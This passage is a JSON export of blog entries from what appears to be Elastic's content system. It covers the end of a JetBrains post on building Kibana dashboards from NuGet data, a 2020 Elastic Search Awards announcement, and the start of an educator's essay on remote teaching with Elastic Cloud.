nuget-packages and click \u003cstrong\u003eNext step\u003c/strong\u003e.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt55009858fbd9fbc3/5fc7c15742256d5ffdf484c0/blog-jetbrains-8.png\" data-sys-asset-uid=\"blt55009858fbd9fbc3\" alt=\"blog-jetbrains-8.png\"/\u003e\u003c/p\u003e\u003cp\u003eOur NuGet data has a time element that we want to utilize in our queries to show changes over time. In some cases, it is best not to select a time field if our data is not time-sensitive. In our current research of published packages on NuGet, we need to select published. Now we're ready to create some visualizations.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltede904b8fa1c30ab/5fc7c16bfd99385ff600a921/blog-jetbrains-9.png\" data-sys-asset-uid=\"bltede904b8fa1c30ab\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eFrom the Kibana menu, we can select \u003cstrong\u003eVisualize\u003c/strong\u003e, which will allow us to create visualizations to use independently or on a cumulative dashboard. Our first visualization is a simple \"Unique count of packages\" in the ecosystem. We can accomplish this by adding a new metric visualization and aggregating with a \u003cstrong\u003eUnique Count\u003c/strong\u003e over \u003cstrong\u003ePackageId\u003c/strong\u003e. Since our index-pattern is also time relevant, we need to set a date filter to include data from the last 12 years. Changing the time range can help us determine what occurred within a current period, which helps chart changes over time.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt88ae0c28ee620161/5fc7c17572a3526f28dc1009/blog-jetbrains-10.png\" data-sys-asset-uid=\"blt88ae0c28ee620161\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eAfter creating several visualizations, we can create a dashboard to help us get a larger image of what's happening. In this example, let's see what packages Elastic has authored with the KQL query authors:elastic.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbb47e2678a2f45c3/5fc7c19742256d5ffdf484c4/blog-jetbrains-11.jpg\" data-sys-asset-uid=\"bltbb47e2678a2f45c3\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eIt's important to note that Kibana is impressive, but be careful with the time picker. We are analyzing a dataset of 3 million records spanning 12 years. If our queries are excessive, then we will start seeing some of our visualizations time out (unless you’re using newer versions of Kibana that let you run queries beyond the timeout window). Elasticsearch does offer \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.10/async-search-intro.html\"\u003easync search for giant queries\u003c/a\u003e, so we’re excited to see if that comes to Kibana dashboards soon.\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003eConclusion\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eElasticsearch and Kibana are an excellent combination for anyone looking to discover exciting facts about their data. Using .NET and packages from the OSS ecosystem make it that much nicer. Additionally, using JetBrains Rider can help folks write, understand, and optimize their data loading process. To read the original article and understand more about the NuGet ecosystem, head over to the \u003ca href=\"https://blog.jetbrains.com/dotnet/2020/11/09/diving-into-nuget-history-for-fun-and-community-insights/)\"\u003eJetBrains .NET blog\u003c/a\u003e and be sure to follow us on Twitter at \u003ca href=\"https://twitter.com/jetbrains\"\u003e@JetBrains\u003c/a\u003e, \u003ca href=\"https://twitter.com/resharper\"\u003e@ReSharper\u003c/a\u003e, and \u003ca href=\"https://twitter.com/jetbrainsrider\"\u003e@JetBrainsRider\u003c/a\u003e. As always, thank you to Elastic and the folks who work on the fantastic \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/client/net-api/current/index.html\" target=\"_self\"\u003eElasticsearch NEST client\u003c/a\u003e because, without them, this post would not be possible.\u003c/p\u003e","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2020-12-02T15:36:16.724Z","created_by":"bltf6ab93733e4e3a73","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt017382ecc448a0ec","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-12-02T15:48:42.830Z","updated_at":"2020-12-02T15:48:42.830Z","content_type":"image/png","file_size":"69513","filename":"blog-banner-jetbrains-es.png","title":"blog-banner-jetbrains-es.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-03T15:55:59.255Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt017382ecc448a0ec/5fc7b75a46f622769b5f35c9/blog-banner-jetbrains-es.png"},"industry":["technology"],"level":[],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":["elasticsearch","kibana"],"publish_date":"2020-12-03T16:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"How JetBrains uses .NET, Elasticsearch, CSVs, and Kibana for awesome dashboards","seo_description_l10n":"Find out how JetBrains used .NET, Elasticsearch, and Kibana to analyze and visualize their community's past as well as make predictions about the future.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"bltad849a44c42eea31","ACL":{},"created_at":"2020-06-17T03:25:54.912Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"software-technology","label_l10n":"Software \u0026 technology","tags":[],"title":"Software \u0026 technology","updated_at":"2020-07-06T22:17:33.856Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.842Z","user":"blt4b2e1169881270a8"}}],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"title":"Visualizing","label_l10n":"Visualizing","keyword":"visualizing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt365f9ed2d77755c7","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:12.101Z","updated_at":"2020-06-17T03:38:12.101Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:12.100Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-06T00:48:22.629Z","user":"blt3044324473ef223b70bc674c"}},{"title":"Ingesting","label_l10n":"Ingesting","keyword":"ingesting","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt886805f7b26ef356","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:57.513Z","updated_at":"2020-06-17T03:37:57.513Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:57.513Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-29T17:20:06.688Z","user":"bltea6cbb86fea188be"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt3ff56eb3b9c58312","ACL":{},"created_at":"2020-06-17T03:33:18.405Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":true,"keyword":"business-analytics","label_l10n":"Business analytics","tags":[],"title":"Business analytics","updated_at":"2020-07-06T22:20:18.826Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.556Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltb15fefedba37f9fd","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-12-02T16:26:33.024Z","updated_at":"2020-12-02T16:26:33.024Z","content_type":"image/jpeg","file_size":"182786","filename":"blog-thumb-jetbrains-es-2.jpg","title":"blog-thumb-jetbrains-es-2.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-03T15:55:59.255Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb15fefedba37f9fd/5fc7c039ffb61e50a0fb1c88/blog-thumb-jetbrains-es-2.jpg"},"title":"How JetBrains uses .NET, Elasticsearch, CSVs, and Kibana for awesome dashboards","title_l10n":"How JetBrains uses .NET, Elasticsearch, CSVs, and Kibana for awesome dashboards","updated_at":"2024-05-01T16:39:11.426Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/how-jetbrains-uses-net-elasticsearch-csv-and-kibana-for-awesome-dashboards","use_case":[],"versions":[],"weekly_category":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:06:21.346Z","user":"blt36e890d06c5ec32c"}},{"uid":"blt620ac9b98dd29653","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Check out Elastic’s newest 2020 Elastic Search Awards honorees for Public Sector, EMEA and APJ.","author":["bltbdcb99c483168722"],"body_l10n":"\u003cp\u003eEvery day at Elastic we're hard at work building better products, solutions, and features. What inspires our innovation, and humbles us at the same time, are the exceptional projects and solutions the community has built using Elastic.\u003c/p\u003e\n\u003cp\u003eWe're excited to recognize some of those extraordinary use cases as part of our regional Elastic Search Awards program.\u003c/p\u003e\n\u003cp\u003eThe Elastic Search Awards categories for the Asia-Pacific-Japan (APJ) and Europe-Middle East-Africa (EMEA) regions include:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eCause Awards for bettering the world\u003c/li\u003e\n \u003cli\u003eCluster Awards for inspiration and uniqueness\u003c/li\u003e\n \u003cli\u003eYou Know, For Search! Awards for a project's potential for growth and for fostering a breakdown of data silos\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe\u003ca href=\"/events/awards/winners\"\u003e Elastic Search Awards\u003c/a\u003e honorees were announced during our virtual, three-day ElasticON Global event. We also honored the EMEA Elastic Certified Professional of the Year for exceptional contributions to the Elastic community. Joining our regional honorees were the global honorees of our Public Sector Search Awards. We \u003ca href=\"/blog/introducing-the-2020-elastic-search-awards-honorees-for-the-americas-region\"\u003eintroduced\u003c/a\u003e the Elastic Search Awards honorees for the Americas region in March.\u003c/p\u003e\n\u003cp\u003e\"The originality demonstrated by the Elastic Search Awards nominees never fails to impress. It's always a challenge to select the honorees, and this year's applicants really put us to the test with an array of innovative contributions and Elasticsearch use cases,” says Madison Bahmer, the chief technology officer of \u003ca href=\"https://www.istresearch.com/\"\u003eIST Research\u003c/a\u003e and member of the Elastic Search Awards \u003ca href=\"/events/awards\"\u003ejudging panel\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eElastic Certified Professional of the Year\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003eWe honored Peter Steenbergen, 37, of the Netherlands, as our 2020 Elastic Certified Professional of the Year for the EMEA region. Steenbergen has earned \u003ca href=\"/training/certification/faq\"\u003eElastic certification\u003c/a\u003e, harnessed Elastic for his own projects, and influenced the \u003ca href=\"/community\"\u003eElastic community\u003c/a\u003e by sharing and championing his Elastic knowledge. He's also the co-founder of \u003ca href=\"https://uptimemate.com/\"\u003eUptimeMate\u003c/a\u003e and is an Elasticsearch consultant. Steenbergen says, “Elastic changed my life after being certified. I get questions from all around the world to help people with their problems or to help them get started with Elasticsearch.”\u003c/p\u003e\n\u003cp\u003eRich Raposa, manager of the Elastic Certification Program and one of the Elastic Search Awards judges, says Steenbergen was one of the very first people to pass the \u003ca href=\"/webinars/preparing-for-the-elastic-certified-engineer-exam\"\u003eElastic Certified Engineer\u003c/a\u003e exam. “Ever since then I have been impressed with his enthusiasm and contributions. He is an active member of the Elastic community, and his Elastic certifications give him the credibility he so rightfully deserves,” Raposa says.\u003c/p\u003e\n\u003cp\u003eWatch the \u003ca href=\"/videos/emea-elastic-search-awards-2020-certified-professional-of-the-year\"\u003evideo\u003c/a\u003e of Peter's story.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eAPJ awards\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eCause Award:\u003c/strong\u003e \u003ca href=\"https://www.blackdoginstitute.org.au/research/data-analytics/digital-phenotyping/\"\u003eBlack Dog Institute\u003c/a\u003e, Australia. The Black Dog Institute is using Elastic in a project called “Instil” to predict the onset of mental illness in young people with data sent from volunteers' cell phones and stored in Elasticsearch.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eCluster Award:\u003c/strong\u003e \u003ca href=\"https://corp.wise-vine.com/\"\u003eWiseVine\u003c/a\u003e, Japan. WiseVine has created a database, built with Elasticsearch, to connect governments and private enterprise at the early stages of the public procurement process for better policy planning, and for a more equitable public procurement process.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eYou Know, For Search! Award\u003c/strong\u003e: \u003ca href=\"https://www.telkom.co.id/sites\"\u003eTelkom Indonesia\u003c/a\u003e, Indonesia. Telkom Indonesia, the largest telecommunications provider in Indonesia, is transforming into a digital telco, and has created a self-service Open API Platform with open source software and Elasticsearch as a means to provide accelerated time-to-market and streamlined user onboarding.\u003c/p\u003e\n\u003cp\u003eWatch the \u003ca href=\"/videos/apj-elastic-search-awards-2020-honorees\"\u003evideo\u003c/a\u003e of the APJ honorees tell their stories.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eEMEA awards\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eCause Award:\u003c/strong\u003e \u003ca href=\"http://www.scio.systems\"\u003eSCiO\u003c/a\u003e, Greece, and \u003ca href=\"https://www.cgiar.org/\"\u003eCGIAR \u003c/a\u003eof France. SCiO provides AI-enabled services for the disruption of the agri-food value chain, and has developed \u003ca href=\"https://gardian.bigdata.cgiar.org/\"\u003eGARDIAN\u003c/a\u003e, a data discovery framework built using Elasticsearch. The GARDIAN framework supports the \u003ca href=\"https://bigdata.cgiar.org/\"\u003eCGIAR Platform for Big Data in Agriculture\u003c/a\u003e, a large-scale initiative to unlock important research publications and data sets about food security, nutrition, and natural resources.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eCluster Award\u003c/strong\u003e: \u003ca href=\"https://www.cedint.upm.es/es\"\u003eCentro de Domótica Integral de la Universidad Politécnica de Madrid\u003c/a\u003e, Spain.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eCentro de Domótica Integral de la Universidad Politécnica de Madrid (CeDInt-UPM) researchers have developed an Internet of Things (IoT) platform using the tools provided by the Elastic Stack to control smart buildings, smart lighting, and smart greenhouses.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eYou Know, For Search! Award: \u003c/strong\u003e\u003ca href=\"https://www.intelligentplant.com/\"\u003eIntelligent Plant\u003c/a\u003e, United Kingdom. Intelligent Plant provides an open and secure Industrial Internet of Things (IIoT) portal known as the Industrial App Store. Elasticsearch provides the Industrial App Store with secure remote performance monitoring of equipment and processes through the analysis and visualization of real-time data.\u0026nbsp;\u003c/p\u003e\n\u003cp\u003eWatch the \u003ca href=\"/videos/emea-elastic-search-awards-2020-honorees\"\u003evideo\u003c/a\u003e of the EMEA honorees tell their stories.\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003ePublic Sector awards\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eCause Award:\u003c/strong\u003e \u003ca href=\"https://www.nationalcrimeagency.gov.uk/\"\u003eNational Crime Agency\u003c/a\u003e, United Kingdom. The National Crime Agency (NCA) is using Elasticsearch to help maximize its understanding of the crimes it investigates. By doing so, this will then help provide a fuller picture of the crime types and enable even better informed decision-making around its operational activity.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eCluster Award\u003c/strong\u003e: \u003ca href=\"https://www.stormfish.io/page/homepage\"\u003eStormfish Scientific\u003c/a\u003e, United States. Stormfish Scientific relies on the Elastic Stack to develop its auroraXR™ platform for building secure, information-rich, multi-user, cross-reality environments. auroraXR™ enables military scientists and engineers, academia, and commercial partners to explore human cognitive processes to better understand how virtual reality and augmented reality technologies impact accuracy, timeliness, and confidence for empowering accelerated, mission-critical decision making.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eYou Know, For Search! Award: \u003c/strong\u003e\u003ca href=\"https://www.leidos.com/\"\u003eLeidos\u003c/a\u003e, United States. Leidos, a defense, aviation, information technology, and biomedical research company, has developed a data discovery platform, built with the Elastic Stack, to make petabytes of sensitive mission data searchable and available to US military and intelligence agencies.\u003c/p\u003e\n\u003cp\u003eWatch the \u003ca href=\"/videos/public-sector-elastic-search-awards-2020-honorees\"\u003evideo\u003c/a\u003e of the public sector honorees tell their stories.\u003c/p\u003e\n\u003cp\u003eCongratulations to all of the Elastic Search Awards honorees!\u003c/p\u003e","category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2020-10-13T19:07:35.770Z","created_by":"bltf6ab93733e4e3a73","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"bltdfe4d7dc0534d82c","created_by":"bltf6ab93733e4e3a73","updated_by":"bltf6ab93733e4e3a73","created_at":"2019-10-11T18:57:31.754Z","updated_at":"2019-10-11T18:57:31.754Z","content_type":"image/png","file_size":"54640","filename":"elastic-awards-blog-banner.png","title":"elastic-awards-blog-banner.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-10-15T17:02:26.793Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdfe4d7dc0534d82c/5da0d09b0767ca0e800b0e55/elastic-awards-blog-banner.png"},"industry":[],"level":[],"markdown_l10n":"","newsfeed":[],"popular_topics":[],"product":["elastic stack"],"publish_date":"2020-10-15T19:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"Introducing the 2020 Elastic Search Awards Honorees","seo_description_l10n":"Check out Elastic’s newest 2020 Elastic Search Awards honorees for Public Sector, EMEA and APJ.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":["elasticon"],"tags":[],"tags_blog_type":["blt9ac2c859f49c83e0"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"title":"Community","label_l10n":"Community","keyword":"community","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt9c74c5bb18c95a80","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-07-14T13:45:14.579Z","updated_at":"2020-07-14T13:45:14.579Z","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-07-14T13:45:14.579Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-08-13T15:01:07.164Z","user":"bltc87e8bcd2aefc255"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt74a7f03b0690d511","title":"elastic-awards-blog-thumb.png","created_by":"sys_blt57a423112de8a853","updated_by":"bltf6ab93733e4e3a73","created_at":"2019-02-04T06:29:17.352Z","updated_at":"2019-10-11T19:00:59.716Z","content_type":"image/png","file_size":"22634","filename":"ElasticAwards_Ad_Blog_Thumbnail_720x420.png","ACL":{},"_version":2,"is_dir":false,"tags":[],"description":"","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-10-11T19:01:17.730Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt74a7f03b0690d511/5c57dbbd52256ff20b4afadd/ElasticAwards_Ad_Blog_Thumbnail_720x420.png"},"title":"Congratulations to our newest 2020 Elastic Search Awards honorees","title_l10n":"Congratulations to our newest 2020 Elastic Search Awards honorees","updated_at":"2024-05-01T13:46:21.091Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/congratulations-to-the-newest-2020-elastic-search-awards-honorees","use_case":[],"versions":[],"weekly_category":[],"publish_details":{"time":"2024-05-01T13:46:25.071Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_version":9,"locale":"en-us","uid":"blt5a299ef8ed8a3cfa","ACL":{},"abstract_l10n":"Find out how Comillas University in Spain has been using Elastic Cloud to make sure social distancing doesn't impact their students' ability to learn.","author":["blt36d791bef278c8ac"],"body_l10n":"\u003cp\u003e\u003cem\u003eOur new \u003c/em\u003e\u003ca href=\"/community/students-and-educators\"\u003e\u003cem\u003eElastic for Students and Educator program\u003c/em\u003e\u003c/a\u003e\u003cem\u003e provides online resources and support to help you teach and learn no matter where you are. Hear from \u003c/em\u003e\u003ca href=\"https://www.linkedin.com/in/lmerchante/\"\u003e\u003cem\u003eLuis Francisco Sánchez Merchante\u003c/em\u003e\u003c/a\u003e\u003cem\u003e, an educator based in Spain, as he reflects on the challenges he’s faced while teaching during a global pandemic.\u003c/em\u003e\u003c/p\u003e\u003cp\u003eWe live in strange days. We feel, as never before, like characters in a disaster movie. We have been affected by pandemics that spread across the world before, but it might be the first time that it has occurred during a time of well-being and technological superiority that made us feel immune. This is an opportunity to reconsider our priorities and an occasion to become aware of our position in the world. But we’ve paid a high price and we’re still paying it.\u003c/p\u003e\u003cp\u003eOur life has been altered to extremes that none of us could have imagined just a year ago. We have been forced to change our routines. Changing habits in the personal sphere will be tough and it will take time to get used to. Unfortunately, we don’t have that time in the professional sphere.\u003c/p\u003e\u003ch2\u003eToo many questions\u003c/h2\u003e\u003cp\u003eThe tourism sector in Spain reached 12.3% of the GDP in 2018. Because of its importance, any butterfly effect around this sector can result in a nationwide hurricane. We can imagine that this sector will receive special attention to make this transition as painless as possible. But what will happen to other less visible sectors?\u003c/p\u003e\u003cp\u003eEducation is an example of one of those sectors of vital importance that is not considered to be a driving force of the economy. So how will the current situation affect schools? Even more importantly, how will this situation affect education itself? Nurseries, primary and secondary schools, and universities are called upon to carry out deep changes — not only at the level of infrastructure but also, and above all, to their education methodology. The success of many academic plans is supported by personalized attention and the proximity between teachers and students: building a motivating environment that favors knowledge generation or leveraging contact networks in the academic community. Can we replace face-to-face education with a completely remote model?\u003c/p\u003e\u003cp\u003eI guess it’s feasible, but it will require a huge effort. Replacing classroom lectures with Zoom or Teams sessions allowed us to overcome the semester with the least possible disruption for students. But this situation may be prolonged. Even if science finds the means to defeat the virus, there is no guarantee that in months or years a similar situation will not reoccur. Changes must be global. We might be living in a time where the trend that technology followed — favouring delocalisation over centralised systems — starts to apply to education.\u003c/p\u003e\u003ch2\u003eCloud providers, educational partners\u003c/h2\u003e\u003cp\u003eRemote education is not only about updating the transmission channel or about keeping the same schedule and educational resources as before, but doing so with the student at home. The advantage of remote learning is that students can manage their own time by accessing class materials and completing requested tasks autonomously. This implies that if certain infrastructure is needed for a lab (access to a database, for example), having those servers up and running only during class is no longer sufficient. Nor is leaving the servers up indefinitely an alternative, because that will certainly be a waste of resources.\u003c/p\u003e\u003cp\u003eThe model that best suits remote education involves cloud technologies. Being able to start or stop services remotely with automatic resource management and deployments that can scale according to demand is the reason why cloud providers appeared. Most educational institutions do not have the capacity to build and administer their own data processing center. Since academic institutions are not money-making machines, collaboration between IT companies and academic institutions is the desired scenario.\u003c/p\u003e\u003cp\u003eWith the quick evolution of IT products (especially those in the big data domain), working on cloud makes it extremely easy to use those products in academic programs. Many products get major upgrades at least once a year, not only to fix bugs, but also to include new features or improve the user experience. After a few upgrades, the version referenced in the training material may have little to do with the current version that is used in the industry. This isn’t the worst situation; sometimes academic programs can be using legacy or deprecated software that students will never see during their professional life. But cloud providers offer a great solution for this issue. Due to their virtual nature, most cloud updates are not disruptive because new updated nodes can be added before removing old ones without stopping the service. This can also be accomplished on premise, but if you have been in that position, the technical, human and administrative complexity to schedule a major upgrade makes many companies ignore or postpone them sometimes indefinitely.\u003c/p\u003e\u003cp\u003eAn encouraging example of the direct collaboration between IT companies and academic institutions is the relationship between Elastic and \u003ca href=\"https://www.comillas.edu/en/\"\u003eComillas University\u003c/a\u003e. I’m a lecturer at the engineering school \u003ca href=\"https://www.comillas.edu/en/icai\"\u003eICAI\u003c/a\u003e, where we are teaching data visualization in several degrees and postgraduate courses. The purpose is that students learn to distinguish use cases and use the appropriate visualization tools. Even though everyone is aware of the most popular dashboarding applications that aim to cover most of the industry’s needs, it is precisely this completeness of vision that can make them waver in some areas.\u003c/p\u003e\u003cp\u003eOne of the most paradigmatic use 